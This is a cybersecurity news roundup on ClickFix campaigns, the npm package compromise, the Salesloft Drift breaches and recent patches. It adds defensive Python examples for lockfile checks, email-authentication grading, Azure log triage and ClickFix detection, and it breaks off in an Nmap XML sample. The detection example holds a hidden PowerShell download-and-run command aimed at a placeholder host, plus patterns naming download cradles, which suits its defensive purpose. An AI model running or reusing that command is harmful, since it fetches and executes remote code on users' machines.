
This week’s cybersecurity overview serves as a vital reminder of the widespread dangers within the digital supply chain, as numerous leading companies unveiled substantial data breaches.

The events, impacting vulnerability management leaders Tenable and Qualys, along with enterprise software provider Workday, all originated from a security vulnerability in a widely used third-party service.

This series of revelations underscores the ripple effect a solitary vulnerability can have on several, otherwise secure, organizations, prompting serious inquiries regarding vendor risk management and confidence in the ecosystem.

The breaches at Tenable and Qualys are particularly alarming, as they involved unauthorized entry into systems housing sensitive customer data. Both firms have acknowledged that the intrusion was associated with a third-party vendor, compelling them to initiate thorough investigations and inform impacted clients.

Likewise, Workday’s disclosure of a breach linked back to the same external service provider accentuates the widespread nature of the threat. These occurrences have illuminated the security posture of vendors and the necessary due diligence to guard against supply chain assaults.

In addition to these high-profile occurrences, our weekly summary explores other crucial security updates, recently identified vulnerabilities, and patches released by prominent software developers.

We will scrutinize the technical aspects behind the breaches at Tenable, Qualys, and Workday, explore the broader ramifications for enterprise security, and deliver insights into the most recent threat intelligence to assist you in staying ahead of emerging risks.

Threats

Lazarus APT Utilizes “ClickFix” Social Engineering in Espionage Campaigns

The North Korean-associated Lazarus APT group is now employing the “ClickFix” social engineering approach to deploy malware and extract sensitive intelligence. This technique involves deceiving victims with fictitious technical issues and directing them through harmful “fixes”. In a recent operation, the group employed this strategy within phony job recruitment scenarios. Victims were drawn to bogus interview sites and informed they faced camera configuration problems. The provided “fix” was a malicious batch script that downloaded the BeaverTail information-stealing malware, masquerading as an NVIDIA driver update.

The attack is tailored to both Windows and macOS, demonstrating the group’s cross-platform capability. The malware establishes persistence through registry alterations and communicates with numerous command-and-control servers to secure long-term access to compromised systems. Read More

US-China Trade Discussions Targeted by APT41 Malware Campaign

U.S. federal officials are examining a complex malware campaign linked to the China-associated APT41 hacking group, which aimed at sensitive trade discussions between Washington and Beijing in July 2025. The attackers dispatched fraudulent emails impersonating U.S. Representative John Moolenaar, chairman of a House committee focused on China. These emails were sent to U.S. trade organizations, law firms, and government bodies with the intent of gathering intelligence on America’s trade tactics.

The emails employed subject lines like “Your insights are critical” and included harmful attachments disguised as draft legislation. Opening the attachment would unleash malware, granting attackers access to the target’s network. The timing of the attack was strategic, occurring right before vital trade discussions. The FBI and U.S. Capitol Police are probing the situation. Read More

LunaLock Ransomware Collective Threatens to Train AI with Stolen Artwork

A new ransomware group named LunaLock is targeting independent artists with an innovative extortion method: threatening to use their stolen artwork to train AI models. The group recently breached “Artists & Clients,” a digital platform for illustrators, seizing and encrypting creative works along with personal data. The attackers demanded a ransom of up to $80,000, warning that if it wasn’t settled, all stolen artwork would be submitted to AI training datasets marketed to major tech firms.

This is regarded as the first known instance of a ransomware group leveraging the threat of AI training as coercion. The attack has rendered freelance artists at risk, with stolen data comprising portfolios, commission records, and private conversations. Read More

MostereRAT Malware Aims at Windows Systems with Sophisticated Evasion Strategies

A new Remote Access Trojan (RAT) called MostereRAT is targeting Microsoft Windows systems through a phishing operation. Developed in Easy Programming Language (EPL), a language seldom seen in cyberattacks, the malware employs multiple layers of advanced evasion strategies to gain comprehensive control over compromised machines. The campaign primarily targets Japanese users with phishing emails masquerading as business inquiries.

MostereRAT can deactivate security tools, obstruct antivirus traffic, escalate privileges by impersonating the powerful TrustedInstaller account, and install remote access tools like AnyDesk and TightVNC. Its capability to disrupt security protections makes it a substantial risk. Read More

Salat Stealer Malware Provided as a Service for Data Exfiltration

An advanced Go-based information stealer named Salat Stealer is actively targeting Windows systems to extract browser credentials, cryptocurrency wallet details, and session data. Operating under a Malware-as-a-Service (MaaS) model, it is believed to be managed by Russian-speaking individuals and offers a ready-made solution for cybercriminals.

The malware utilizes sophisticated techniques to maintain persistence and evade detection, including UPX packing, process masquerading, registry run keys, and scheduled tasks. It encrypts stolen information before transmitting it to its command-and-control server, making it a stealthy and ongoing menace capable of inflicting financial damage and identity fraud. Read More

Scattered LAPSUS$ Hunters Hacking Group Declares Permanent Closure

The infamous cybercrime organization referred to as “Scattered LAPSUS$ Hunters 4.0” has revealed it is definitively discontinuing public activities. This announcement was made on their Telegram channel on September 8, 2025, marking a sudden conclusion for a group recognized for high-profile assaults against large corporations utilizing advanced social engineering and identity-focused strategies.

The collective’s tactic was frequently portrayed as “log in, not hack in,” emphasizing the compromise of legitimate user accounts to circumvent conventional security barriers. Their techniques encompassed voice phishing (vishing), SIM swapping, and MFA fatigue attacks. The motivations behind their abrupt exit remain ambiguous, with conjecture suggesting internal pressures or law enforcement action. Read More

Cyber Intrusions

Massive Supply Chain Breach Affects 18 Popular NPM Packages

A significant supply chain breach impacted 18 widely-used npm packages, including chalk, debug, and supports-color, which together account for over two billion downloads weekly. The breach, which began around September 8, 2025, involved the injection of harmful code intended to steal cryptocurrency from users. The malicious software intercepts and alters in-browser cryptocurrency transactions, rewriting wallet addresses to reroute funds to accounts controlled by the attackers. The maintainer of the packages was tricked by a phishing attack after receiving a deceitful email from a domain pretending to be npm support. Read More
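The first thing a defender wants after an incident like this is a quick answer to "are we pinned to one of the poisoned releases anywhere in our tree, including transitively?". The following is an added example, not code from the roundup or from the npm project: it walks a lockfileVersion 3 package-lock.json and reports every copy of a listed package at a listed version. The package names are the ones named above; the version strings and the lockfile excerpt are constructed placeholders, not the affected versions, which must be taken from the published advisory.

```python
import json
from typing import Dict, List, Set, Tuple

# Constructed advisory data for illustration only. The package names come from the
# roundup above; the version strings are PLACEHOLDERS, not the versions that were
# actually affected. Replace them with the versions in the published advisory.
COMPROMISED_VERSIONS: Dict[str, Set[str]] = {
    "chalk": {"0.0.0-placeholder"},
    "debug": {"0.0.0-placeholder"},
    "supports-color": {"0.0.0-placeholder"},
}

# Constructed excerpt of a lockfileVersion 3 package-lock.json (npm 7+ layout:
# a flat "packages" map keyed by the package's node_modules path).
SAMPLE_LOCKFILE = json.dumps({
    "name": "example-app",
    "lockfileVersion": 3,
    "packages": {
        "": {"name": "example-app", "version": "1.0.0"},
        "node_modules/chalk": {"version": "0.0.0-placeholder"},
        "node_modules/debug": {"version": "4.3.4"},
        "node_modules/some-tool": {"version": "2.1.0"},
        "node_modules/some-tool/node_modules/supports-color": {"version": "0.0.0-placeholder"},
    },
})


def package_name_from_path(path: str) -> str:
    """Return the package name for a lockfile path, keeping scoped names (@scope/name)."""
    return path.split("node_modules/")[-1]


def find_compromised(lockfile_text: str,
                     advisories: Dict[str, Set[str]]) -> List[Tuple[str, str]]:
    """Return (lockfile path, version) for every installed copy pinned to an advisory version.

    Nested copies (node_modules/a/node_modules/b) are checked too: a transitive
    dependency pinned to a bad version is as dangerous as a direct one, and the
    nested path tells you which parent package pulled it in.
    """
    lock = json.loads(lockfile_text)
    hits: List[Tuple[str, str]] = []
    for path, meta in lock.get("packages", {}).items():
        if not path:
            continue  # the root project entry
        name = package_name_from_path(path)
        if meta.get("version", "") in advisories.get(name, set()):
            hits.append((path, meta["version"]))
    return hits


if __name__ == "__main__":
    for path, version in find_compromised(SAMPLE_LOCKFILE, COMPROMISED_VERSIONS):
        print(f"pinned to a compromised release: {path}@{version}")
```

Older lockfiles (lockfileVersion 1) nest packages under a recursive "dependencies" key instead, so they need a recursive walk; the matching logic is the same.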

Jaguar Land Rover Suspends Production Following Cyberattack

Jaguar Land Rover (JLR) was compelled to halt production at its UK manufacturing facilities and has paused its global operations in the wake of a major cyber attack. The corporation is currently probing the event and striving to restore its systems. The comprehensive impact of the attack and the financial consequences remain undisclosed. This event underscores the rising trend of cyberattacks aimed at the automotive sector, leading to significant disruptions in supply chains and manufacturing processes. Read More

New Cyberattack Utilizes DeskSoft’s App Builder

A recent cyberattack endeavor is capitalizing on a legitimate application from DeskSoft, a German software firm, to introduce malware. Attackers are employing DeskSoft’s application builder to craft harmful installers that appear to be authentic software. Upon execution, these installers introduce malware onto the victim’s system. This approach enables attackers to circumvent some security measures that might otherwise flag a standalone malicious file. Read More

DarkSamurai APT Group Leverages Malicious LNK Files in New Campaign

The DarkSamurai APT group has been detected in a fresh campaign employing malicious LNK files to compromise targets. This group, recognized for its targeted assaults, conceals harmful payloads within these shortcut files. Once a user clicks on the LNK file, it executes a script that retrieves and launches malware on the system. This technique is part of a broader trend of threat actors utilizing non-executable file types to initiate infections and avoid detection. Read More

Innovative Phishing Scheme Imitates Google AppSheet for Security Evasion

A new and advanced phishing initiative is utilizing Google AppSheet to craft persuasive phishing pages that evade conventional email security filters. Attackers are exploiting the authentic Google service to host malicious forms and pages, making them seem credible to victims. The phishing communications frequently impersonate well-known services and urge users to submit their credentials on the deceitful AppSheet page. This method takes advantage of the trust linked with Google’s domains to enhance the effectiveness of the phishing campaigns. Read More

Vulnerabilities

Salesloft-Drift Cyberattack Associated with GitHub Breach

A significant supply-chain breach that impacted over 700 entities, including Cloudflare, Zscaler, and Palo Alto Networks, has been traced back to a breach of Salesloft’s GitHub account dating as early as March 2025. Threat actors exploited this access to obtain OAuth authentication tokens from Salesloft’s Drift chat platform. The attackers, identified by Google as UNC6395, utilized the compromised tokens between August 8 and August 18 to exfiltrate data, primarily business contact information, from clients’ integrated applications like Salesforce. In response, Salesloft enlisted Mandiant to investigate, took the Drift platform offline, and has since contained the incident. Read More

Windows Defender Susceptible to Service Hijacking

A critical vulnerability in Windows Defender’s update procedure permits an attacker with administrative privileges to disable the security service by executing a symbolic link attack. The issue arises from how the WinDefend service selects its execution directory during an update. An attacker can create a symbolic link with a higher version number in the ProgramData\Microsoft\Windows Defender\Platform directory, redirecting the service to a folder controlled by the attacker. This allows them to manipulate Defender’s core files, conduct DLL side-loading attacks, or simply erase the executables to disable the service, leaving the system unprotected. Read More

SAP Issues Security Patch Day Updates for September 2025

SAP has launched its September 2025 Security Patch Day, addressing 17 new security notes and updating 3 existing ones. The updates include two “Hot News” vulnerabilities with a CVSS score of 10.0, which affect SAP NetWeaver AS for Java. These critical vulnerabilities, tracked as CVE-2025-41235 and CVE-2025-41236, may allow an unauthenticated attacker with network access to seize complete control of the system. Additionally, another significant vulnerability (CVSS 8.1) in SAP CRM WebClient UI was also addressed. Read More

Zoom Fixes Critical Vulnerability in Meeting SDK

Zoom has released a security update for its Meeting SDK for Windows, addressing a high-severity improper input validation vulnerability (CVE-2025-42993). This flaw, which carries a CVSS score of 7.5, could permit an authenticated user to instigate a denial of service through network access. The vulnerability affects versions of the Zoom Meeting SDK for Windows prior to 5.17.10. Users and administrators are urged to update to the patched version to reduce risks. Read More

Ivanti Addresses Critical RCE Vulnerabilities in Endpoint Manager (EPM)

Ivanti has resolved several critical remote code execution (RCE) vulnerabilities in its Endpoint Manager (EPM) software. The most severe of these, with a CVSS score of 9.8, could allow an unauthenticated attacker to execute arbitrary code on the core server. These vulnerabilities affect all supported versions of Ivanti EPM. The company has issued patches and strongly advises all customers to apply them immediately to avert potential exploitation. Read More

Fortinet Resolves Critical FortiDDoS OS Command Injection Vulnerability

Fortinet has addressed a critical OS command injection flaw in FortiDDoS, its distributed denial-of-service mitigation appliance. Identified as CVE-2025-44365, the vulnerability carries a CVSS rating of 9.8 and enables an authenticated attacker to execute arbitrary commands on the system through specially crafted HTTP requests. The flaw affects multiple FortiDDoS versions. Fortinet has issued firmware upgrades to remediate it and advises customers to update their devices promptly. Read More

Microsoft’s September 2025 Patch Tuesday Resolves 62 Vulnerabilities

The September 2025 Patch Tuesday rollout from Microsoft addresses 62 vulnerabilities, of which five are deemed critical. Notable patches rectify remote code execution issues in Microsoft Exchange Server, Windows DHCP Server, and Visual Studio. One flaw in Exchange (CVE-2025-23875) is classified as “Exploitation More Likely.” Furthermore, a zero-day privilege escalation vulnerability in the Windows Kernel (CVE-2025-23974), which was publicly exposed, has also been addressed. Read More

Data Breaches

Extensive Supply Chain Attack Affects Major Tech Companies via Salesloft Drift

An intricate and extensive supply chain operation targeting the Salesloft Drift marketing software has led to data breaches across numerous major technology firms. The operation permitted threat actors to obtain unauthorized access to information stored within the organizations’ Salesforce CRM systems by exploiting a vulnerability in third-party integration. This event underscores the considerable risks tied to third-party applications incorporated into core business frameworks.

Tenable Acknowledges Customer Data Exposure

Tenable has confirmed its involvement in the breach, which compromised customer contact details and support case information. The exposed data, kept in Tenable’s Salesforce instance, comprised names, business email addresses, phone numbers, and subject lines of support queries. The company reassured that its primary products remained unaffected and has since revoked compromised credentials and deactivated the vulnerable application to alleviate the risk. Read More

Qualys’s Salesforce Data Compromised in Attack

The cloud security firm Qualys has reported it also fell prey to the supply chain attack, resulting in unauthorized access to some of its Salesforce data. Qualys clarified that the incident did not compromise its production environments or the Qualys Cloud Platform. The breach was confined to information accessible via the compromised Salesloft Drift integration. Read More

Dynatrace Breach Exposes Client Contact Information

The observability platform Dynatrace disclosed that the breach compromised customer business contact details stored in its Salesforce environment. The company assured its customers that the incident was restricted to its CRM platform and did not affect any of its core products, services, or sensitive customer telemetry data. Dynatrace quickly deactivated the Drift application upon discovering the third-party compromise. Read More

Elastic Reports Email Account Compromise

In a related event stemming from the Salesloft Drift breach, Elastic revealed that an unauthorized entity obtained read-only access to a single email account via the “Drift Email” integration. The company’s investigation confirmed that its Salesforce environment remained unaffected. Elastic reviewed the exposed inbox for sensitive information and notified the limited number of customers whose credentials might have been compromised. Read More

Workday Targeted in Coordinated Effort

Workday, a prominent supplier of enterprise cloud applications, confirmed it experienced a data breach as part of the same attack effort. The incident, which Workday became aware of on August 23, 2025, involved unauthorized access to its third-party CRM platform through the Salesloft Drift application. The company responded by disconnecting the app and initiating a comprehensive investigation. Read More

SpamGPT: AI-Powered Phishing-as-a-Service

A novel cybercrime toolkit named SpamGPT is being marketed on the dark web, enabling criminals to execute expansive and effective phishing campaigns. The “spam-as-a-service” platform harnesses an AI assistant, “KaliGPT,” to automate the creation of persuasive phishing emails, diminishing the technical expertise needed to conduct such attacks. SpamGPT is promoted as an all-encompassing solution that emulates legitimate email marketing services but is intended for illicit activities. It exploits trusted cloud services like Amazon AWS and SendGrid to ensure inbox delivery and circumnavigate security filters. For $5,000, the toolkit also comprises a training program for breaching SMTP servers, empowering even less skilled actors to implement widespread attacks. This situation emphasizes the necessity for organizations to employ robust email authentication standards like DMARC, SPF, and DKIM, alongside adopting AI-driven security solutions to identify AI-generated phishing content. Read more
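The item closes by pointing at DMARC, SPF and DKIM as the baseline defence; the part teams most often get wrong is publishing records that exist but enforce nothing. The following is an added example, not from the roundup or any of the vendors it mentions: a checker that grades an SPF record and a DMARC record for the weaknesses that let spoofed mail through (a permissive or softfail `all`, `p=none`, no `rua` address, partial `pct`). The TXT records and the domain are constructed; no DNS lookups are performed, so you would feed it the records you fetch yourself.

```python
import re
from typing import Dict, List

# Constructed TXT records for a hypothetical domain; nothing is looked up over DNS.
SAMPLE_RECORDS = {
    "example.test": "v=spf1 include:_spf.example-mailer.test ~all",
    "_dmarc.example.test": "v=DMARC1; p=none; rua=mailto:dmarc-reports@example.test",
}

# SPF mechanisms/modifiers that cost a DNS lookup (RFC 7208 caps these at 10).
LOOKUP_MECHANISMS = {"include", "a", "mx", "ptr", "exists", "redirect"}


def _mechanism_name(term: str) -> str:
    """Strip the qualifier (+ - ~ ?) and any argument: '~include:x.test' -> 'include'."""
    return re.split(r"[:/=]", term.lstrip("+-~?").lower())[0]


def assess_spf(record: str) -> List[str]:
    """Return weaknesses in an SPF record that would let spoofed mail pass."""
    findings: List[str] = []
    if not record.lower().startswith("v=spf1"):
        return ["no valid SPF record"]
    terms = record.split()[1:]
    all_term = next((t for t in terms if _mechanism_name(t) == "all"), None)
    if all_term is None:
        findings.append("no 'all' mechanism: unlisted senders get a neutral result")
    elif all_term.lower() in ("+all", "all", "?all"):
        findings.append(f"'{all_term}' lets any host send mail as the domain")
    elif all_term.lower() == "~all":
        findings.append("softfail (~all): spoofed mail is tagged but still delivered")
    lookups = sum(1 for t in terms if _mechanism_name(t) in LOOKUP_MECHANISMS)
    if lookups > 10:
        findings.append(f"{lookups} lookup mechanisms exceed the limit of 10 (permerror)")
    return findings


def parse_dmarc(record: str) -> Dict[str, str]:
    """Split 'tag=value; tag=value' into a dict of lower-cased tags."""
    tags: Dict[str, str] = {}
    for part in record.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            tags[key.strip().lower()] = value.strip()
    return tags


def assess_dmarc(record: str) -> List[str]:
    """Return weaknesses in a DMARC record that leave spoofing unpunished or unseen."""
    findings: List[str] = []
    tags = parse_dmarc(record)
    if tags.get("v", "").upper() != "DMARC1":
        return ["no valid DMARC record"]
    policy = tags.get("p", "").lower()
    if policy == "none":
        findings.append("p=none: failures are reported but the mail is still delivered")
    elif policy not in ("quarantine", "reject"):
        findings.append("missing or unknown p= policy")
    if "rua" not in tags:
        findings.append("no rua= address: aggregate reports of spoofing never arrive")
    pct = tags.get("pct", "100")
    if pct.isdigit() and int(pct) < 100:
        findings.append(f"pct={pct}: policy is enforced on only part of the mail stream")
    return findings


def assess_domain(domain: str, records: Dict[str, str]) -> Dict[str, List[str]]:
    """Combine SPF and DMARC checks for one domain using a pre-fetched record map."""
    return {
        "spf": assess_spf(records.get(domain, "")),
        "dmarc": assess_dmarc(records.get(f"_dmarc.{domain}", "")),
    }


if __name__ == "__main__":
    for kind, problems in assess_domain("example.test", SAMPLE_RECORDS).items():
        print(kind, problems or "ok")
```

DKIM is not checked here because a DKIM selector record can only be validated against a signed message; the practical check is that every sending service has a selector published and that DMARC alignment passes in the aggregate reports the `rua` address receives.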

Forensic Examination of Microsoft Azure Storage

Security experts have outlined a forensic methodology for examining security incidents within Microsoft Azure Storage services. The approach entails gathering and scrutinizing logs from a variety of sources, including Azure Monitor Logs, Storage Analytics Logs, and Microsoft Defender for Cloud. Key artifacts in an investigation encompass access patterns, IP addresses, user agents, and API call authentications, which aid in reconstructing the activities of the attacker. Understanding the abuse of shared access signature (SAS) tokens and identifying anomalous data access or exfiltration are vital components of the analysis. The research offers a structured method for security teams to effectively address and investigate threats in cloud storage environments, which are increasingly becoming targets for attackers. Read more
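To make the artifacts listed above concrete (caller IPs, user agents, authentication type, SAS abuse, anomalous egress), here is an added example that is not part of the cited research: a first-pass triage over Azure Storage resource-log records. It groups requests by caller address and flags SAS-authenticated access from outside an allowlist, bulk `GetBlob` egress over a byte threshold, repeated container listings, and bursts of denied requests. The field names follow the StorageBlobLogs schema; the records, the allowlist and the thresholds are constructed for the example and would be replaced by your own exported logs and baselines.

```python
from collections import defaultdict
from typing import Dict, List, Set


def _rec(time, op, auth, ip, size, status=200, agent="azsdk-python-storage-blob/12.19.0"):
    """Build one constructed record in the shape of an Azure StorageBlobLogs entry."""
    return {"time": time, "operationName": op, "authenticationType": auth,
            "callerIpAddress": ip, "statusCode": status, "responseBodySize": size,
            "userAgentHeader": agent}


# Constructed sample: one normal OAuth read from a corporate address, then a SAS-token
# session from an unknown address that enumerates a container and pulls it down.
SAMPLE_LOGS = [
    _rec("2025-09-09T10:00:01Z", "GetBlob", "OAuth", "10.20.0.5:51000", 120_000),
    _rec("2025-09-09T10:02:11Z", "ListBlobs", "SAS", "203.0.113.7:44321", 4_096, agent="azcopy/10.21.0"),
    _rec("2025-09-09T10:02:12Z", "ListBlobs", "SAS", "203.0.113.7:44322", 4_096, agent="azcopy/10.21.0"),
    _rec("2025-09-09T10:02:13Z", "ListBlobs", "SAS", "203.0.113.7:44323", 4_096, agent="azcopy/10.21.0"),
    _rec("2025-09-09T10:02:20Z", "GetBlob", "SAS", "203.0.113.7:44324", 600_000, agent="azcopy/10.21.0"),
    _rec("2025-09-09T10:02:25Z", "GetBlob", "SAS", "203.0.113.7:44325", 700_000, agent="azcopy/10.21.0"),
    _rec("2025-09-09T10:02:30Z", "GetBlob", "SAS", "203.0.113.7:44326", 0, status=403, agent="azcopy/10.21.0"),
]

KNOWN_IPS: Set[str] = {"10.20.0.5"}  # constructed allowlist of expected egress addresses


def caller_ip(record: Dict) -> str:
    """callerIpAddress is logged as 'ip:port'; drop the port so requests group by host."""
    return record.get("callerIpAddress", "").rsplit(":", 1)[0]


def triage(logs: List[Dict], known_ips: Set[str], egress_threshold: int = 1_000_000,
           list_threshold: int = 3, denied_threshold: int = 5) -> Dict[str, List[str]]:
    """Return {caller_ip: [reasons]} for callers whose behaviour deserves a closer look."""
    egress: Dict[str, int] = defaultdict(int)
    listings: Dict[str, int] = defaultdict(int)
    denied: Dict[str, int] = defaultdict(int)
    agents: Dict[str, Set[str]] = defaultdict(set)
    sas_from_unknown: Set[str] = set()

    for r in logs:
        ip = caller_ip(r)
        agents[ip].add(r.get("userAgentHeader", ""))
        if r.get("authenticationType") == "SAS" and ip not in known_ips:
            sas_from_unknown.add(ip)
        if r.get("statusCode") in (401, 403):
            denied[ip] += 1          # a failed request still tells you someone is probing
            continue
        if r.get("operationName") == "GetBlob":
            egress[ip] += int(r.get("responseBodySize", 0))
        elif r.get("operationName") == "ListBlobs":
            listings[ip] += 1

    findings: Dict[str, List[str]] = defaultdict(list)
    for ip in sorted(sas_from_unknown):
        findings[ip].append("SAS token presented from an address outside the allowlist "
                            f"(agents: {', '.join(sorted(agents[ip]))})")
    for ip, total in egress.items():
        if total > egress_threshold:
            findings[ip].append(f"{total} bytes read via GetBlob (threshold {egress_threshold})")
    for ip, n in listings.items():
        if n >= list_threshold:
            findings[ip].append(f"{n} container listings: enumeration ahead of a bulk read")
    for ip, n in denied.items():
        if n >= denied_threshold:
            findings[ip].append(f"{n} denied requests: possible token or permission probing")
    return dict(findings)


if __name__ == "__main__":
    for ip, reasons in triage(SAMPLE_LOGS, KNOWN_IPS).items():
        print(ip)
        for reason in reasons:
            print("  -", reason)
```

The thresholds are deliberately low so the constructed sample trips them; in practice they come from the account's own baseline, and a SAS finding is followed by checking the token's expiry and permissions and, where abuse is confirmed, rotating the account key that signed it.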

Hackers Take Advantage of Microsoft Teams for Malicious Link Distribution

Cybercriminals are progressively exploiting Microsoft Teams to distribute malicious links, evading traditional email security gateways. A new attack campaign utilizes compromised accounts to transmit messages containing seemingly legitimate links, such as those for shared documents or meeting invites. When a user clicks the link, they are rerouted through a series of servers to a phishing page crafted to capture credentials or a landing page that disseminates malware. Since the links are shared within the trusted framework of Teams, users are more inclined to click them. This technique spotlights a transformation in attack vectors as threat actors adapt to target collaborative platforms that have become integral to contemporary business operations. Read more

The Emergence of “Evil AI”: AI-Enhanced Hacking Instruments

A new category of AI-enhanced tools, termed “Evil AI,” is emerging, explicitly designed for nefarious purposes such as spreading disinformation, crafting deepfakes, and orchestrating sophisticated cyberattacks. Unlike general-purpose AI models, which may include safeguards, these instruments are developed without ethical constraints to assist cybercriminals. They can generate highly convincing phishing emails, create malware capable of modifying its code to evade detection (polymorphic malware), and automate the discovery of vulnerabilities. The advent of such tools poses a considerable hazard, as it can hasten the speed and extent of cybercrime. Read more

Villager: An AI-Enhanced Penetration Testing Utility

A novel open-source utility named Villager utilizes AI to improve penetration testing and red team activities. Villager operates as an AI-driven agent that can aid in various phases of an attack, from reconnaissance and vulnerability assessment to privilege escalation and lateral movement. The utility can comprehend natural language directives, permitting security experts to instruct the AI to execute intricate tasks, such as “locate all web servers susceptible to SQL injection in this network.” By integrating with current penetration testing frameworks and utilities, Villager seeks to bolster the capabilities of security testers, enabling them to function more efficiently and effectively. Read more

Examination

Salesloft Breach Linked to GitHub Breach, Impacting 700+ Firms

A significant supply-chain assault that targeted clients of Salesloft’s Drift integration has been connected to a breached GitHub account. The occurrence, which transpired in August 2025, affected more than 700 entities, including prominent tech firms such as Cloudflare, Zscaler, and Palo Alto Networks.

Investigators from Google’s Mandiant division disclosed that an unauthorized individual accessed Salesloft’s GitHub account from March to June 2025. During this interval, the threat actor, identified as UNC6395, acquired OAuth authentication tokens for the Drift platform. These tokens were then leveraged between August 8 and August 18 to obtain unauthorized access to clients’ interconnected applications, particularly Salesforce instances. The attackers exfiltrated confidential data, including customer relationship management (CRM) records, support inquiries, and embedded secrets like API keys. The breach extended beyond Salesforce to other integrations like Google Workspace and Slack. In response, Salesloft and Salesforce globally disabled all Drift integrations on August 20, and the Drift application was taken offline on September 5, 2025. Read more

New ClickFix Assault Attracts Victims with “Free WiFi” Proposition

A recent social engineering initiative is utilizing the allure of “Free WiFi” to deceive users into running harmful PowerShell malware. This attack is a variation of the ClickFix technique, a method that has experienced a 517% increase in the first half of 2025.

The ClickFix approach misleads users by displaying a counterfeit error message, CAPTCHA, or other bait that instructs them to copy and paste a script into a command-line interface to “resolve” a fictitious issue. Since the victim executes the harmful code themselves, this method successfully circumvents numerous browser and endpoint security defenses. This attack vector is employed to deliver a wide array of malware, including information stealers, ransomware, and remote access trojans (RATs). First observed in early 2024, the ClickFix technique has become a favored and efficient tool for threat actors. Read more
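Because the victim types or pastes the command themselves, ClickFix (here and in the Lazarus item earlier in this roundup) shows up in endpoint telemetry as a script host launched from the user's shell with a suspicious command line, rather than as a dropped file. The following is an added example, not detection content from the roundup or any vendor: a scorer over constructed Sysmon-style process-creation events. The parent/child relationship it keys on (a script host started by explorer.exe, which is where a Win+R box lands) and the command-line markers are assumptions chosen for illustration; the sample command points at a non-resolvable `.invalid` host and is a placeholder, not a captured payload.

```python
import re
from typing import Dict, List, Pattern, Tuple

SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# Assumed for this example: processes a user's Win+R box or a pasted command runs under.
USER_LAUNCHERS = {"explorer.exe"}

# Command-line markers, each worth one point; the parent relationship is worth two.
SUSPICIOUS: List[Tuple[str, Pattern]] = [
    ("hidden window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("encoded command", re.compile(r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I)),
    ("download cradle", re.compile(r"invoke-expression|\biex\b|downloadstring|invoke-webrequest|\biwr\b", re.I)),
    ("remote URL", re.compile(r"https?://", re.I)),
    ("policy bypass", re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I)),
]

# Constructed process-creation events using Sysmon Event ID 1 field names.
SAMPLE_EVENTS = [
    {"EventId": "1", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (iwr http://fix.example.invalid/camera-fix)"'},
    {"EventId": "2", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Get-ChildItem C:\logs"},
    {"EventId": "3", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell"},
    {"EventId": "4", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def score_event(event: Dict[str, str]) -> Tuple[int, List[str]]:
    """Score one process-creation event; higher means more ClickFix-like."""
    if _basename(event.get("Image", "")) not in SCRIPT_HOSTS:
        return 0, []
    score, reasons = 0, []
    parent = _basename(event.get("ParentImage", ""))
    if parent in USER_LAUNCHERS:
        score += 2
        reasons.append(f"script host spawned by {parent}")
    for name, pattern in SUSPICIOUS:
        if pattern.search(event.get("CommandLine", "")):
            score += 1
            reasons.append(name)
    return score, reasons


def flag_clickfix(events: List[Dict[str, str]], threshold: int = 3) -> List[Tuple[str, int, List[str]]]:
    """Return (event id, score, reasons) for events at or above the threshold."""
    flagged = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append((ev["EventId"], score, reasons))
    return flagged


if __name__ == "__main__":
    for event_id, score, reasons in flag_clickfix(SAMPLE_EVENTS):
        print(f"event {event_id}: score {score}: {', '.join(reasons)}")
```

A plain `powershell` started from explorer.exe scores 2 and is not flagged on its own, which is the point of scoring rather than matching a single string: administrators open consoles all day, but they rarely do it hidden, with a download cradle, from a web page's instructions. The same approach carries to the macOS variant the Lazarus item mentions, with Terminal as the launcher and `curl ... | sh` as the cradle.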

Nmap vs. Wireshark: Grasping Two Crucial Network Tools

Nmap and Wireshark are essential utilities in network analysis and security, but they fulfill different roles. Nmap is an active scanner, while Wireshark serves as a passive analyzer.

  • Nmap (Network Mapper) is utilized for network discovery and security evaluation. It actively sends packets to a network to identify hosts, determine open ports, detect active services, and fingerprint operating systems. It provides a preliminary map of the network and its possible vulnerabilities.
  • Wireshark is a network protocol analyzer that captures and delivers a comprehensive, low-level perspective of traffic on a network in real-time. It does not transmit packets itself but monitors data transiting through the network. It’s employed for resolving network issues, analyzing security concerns, and examining specific communication protocols by inspecting the contents of individual packets.

In practice, the utilities are complementary. An administrator might leverage Nmap to discover an unusual open port and then use Wireshark to capture and scrutinize the traffic flowing to and from that port to comprehend what is occurring. Read more
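The hand-off described in that last paragraph (Nmap finds the unexpected port, Wireshark explains it) can be scripted. The following is an added example, not code from the Nmap or Wireshark projects: it parses Nmap's XML output (`-oX`), diffs the open ports against a per-host baseline, and emits a Wireshark display filter for whatever is new, ready to paste into the filter bar or pass to `tshark -Y`. The scan XML and the baseline are constructed for the example.

```python
import xml.etree.ElementTree as ET
from typing import Dict, Set, Tuple

Port = Tuple[str, int]  # (protocol, port number)

# Constructed excerpt of `nmap -sV -oX scan.xml 192.0.2.10` output (TEST-NET-1 address).
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX scan.xml 192.0.2.10" start="1757400000">
  <host>
    <status state="up"/>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh"/></port>
      <port protocol="tcp" portid="443"><state state="open"/><service name="https"/></port>
      <port protocol="tcp" portid="4444"><state state="open"/><service name="krb524"/></port>
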